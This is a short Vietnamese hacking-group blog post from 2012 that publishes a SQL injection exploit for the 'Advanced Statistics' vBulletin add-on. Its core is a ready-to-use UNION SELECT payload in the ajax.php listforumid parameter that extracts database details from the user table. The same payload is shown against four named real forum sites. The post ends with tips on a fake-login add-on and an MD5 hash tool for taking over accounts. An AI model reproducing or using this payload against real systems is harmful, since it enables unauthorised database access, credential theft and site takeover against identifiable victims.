Trang chủ
»
Hacking and Security
»
SQL Injection
»
vBulletin
» ChangUonDyU - Advanced Statistics SQL injection
25 thg 10, 2012
ChangUonDyU - Advanced Statistics SQL injection
010101010101010101010101010101010101010101010101010101010
1 VNHGROUP 0
0 H4cking - S3cure - Und3rGroup 0
010101010101010101010101010101010101010101010101010101010
#####################################################################################################
->Vulnerability
#####################################################################################################
->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum& listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,
user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://vietsource.net/forum/ajax.php?do=inforum& listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c, user(),version(),database()), 8,9,10,11 from user where userid=1-- -&result=20
http://tuoitredonganh.vn/diendan/ajax.php?do=inforum& listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c, user(),version(),database()), 8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager fake login
[+] Md5 Hash Generator ->http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno-okyo & all VNHgroup members
##########################################################################################
Không có nhận xét nào:
Đăng nhận xét